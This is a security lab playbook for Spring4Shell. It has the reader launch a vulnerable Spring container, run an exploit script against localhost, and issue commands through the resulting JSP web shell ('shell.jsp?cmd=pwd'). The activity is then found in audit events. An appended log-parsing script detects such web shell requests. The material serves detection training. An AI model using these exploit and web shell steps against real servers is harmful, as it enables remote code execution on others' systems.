Threat Stack Playbooks

Spring4Shell Playbook

First, access the Ubuntu 20.04 LTS Linux box via WebShell.

../_images/UbuntuWebshell.png

Next, navigate to the /spring4shell/ directory found in root by entering the following command:

cd /spring4shell/

../_images/CDDirectoryCommand.png

Next, to spin up the vulnerable Spring server, run the following command:

docker run -p 80:8080 spring4shell

After you run the command, you should see the following screen.

../_images/Spring4ShellScreen.png

Go back to UDF and open another shell connection to the Linux host. Then run the following command:

curl localhost/helloworld/greeting

The following output should manifest.

../_images/CurlOutput.png

Now, to exploit the server, navigate to the spring4shell directory and run the exploit script from there with the following commands.

cd /spring4shell/
python3 exploit.py --url 'http://localhost/helloworld/greeting'

The following output should manifest.

../_images/CurlOutput2.png

Now run the following command via shell:

curl 'http://localhost/shell.jsp?cmd=pwd' --output -

Note

Include the --output flag, as it is required for the output to display.

Then run:

touch yougotpwndStudentN.txt

If you navigate to event search and enter the following query, you will see your command.

event_type = "audit" and command = "touch"

../_images/pwned2.gif
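
The event search above finds the command from the host's audit events. As an added example (not part of the original playbook and not Threat Stack code), the same web shell requests can also be found in the web server's access log. The log lines, the Common Log Format layout and the extra parameter names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Common Log Format (assumed format, not lab output).
SAMPLE_LOG = """\
127.0.0.1 - - [01/Apr/2022:10:00:01 +0000] "GET /helloworld/greeting HTTP/1.1" 200 52
127.0.0.1 - - [01/Apr/2022:10:00:09 +0000] "GET /shell.jsp?cmd=pwd HTTP/1.1" 200 31
127.0.0.1 - - [01/Apr/2022:10:00:15 +0000] "GET /shell.jsp?cmd=touch%20yougotpwndStudentN.txt HTTP/1.1" 200 12
10.0.0.7 - - [01/Apr/2022:10:01:00 +0000] "GET /index.jsp?page=2 HTTP/1.1" 200 90
10.0.0.7 - - [01/Apr/2022:10:01:05 +0000] "GET /shell.jsp?cmd=pwd HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# "cmd" is the parameter used on this page; the others are assumed variants.
SUSPECT_PARAMS = {"cmd", "command", "exec"}


def find_webshell_hits(log_text):
    """Return one record per request that passes a command parameter to a JSP."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines instead of failing
        url = urlsplit(m["target"])
        if not url.path.lower().endswith((".jsp", ".jspx")):
            continue
        # parse_qs URL-decodes values, so %20 in the log becomes a space
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() not in SUSPECT_PARAMS:
                continue
            for value in values:
                hits.append({
                    "client": m["client"], "time": m["ts"], "path": url.path,
                    "command": value, "served": m["status"] == "200",
                })
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        state = "served" if hit["served"] else "not served"
        print(f'{hit["time"]} {hit["client"]} {hit["path"]} '
              f'requested {hit["command"]!r} ({state})')
```

A hit with a 200 status means the JSP exists and answered, which is the case worth correlating with the audit events from the event search.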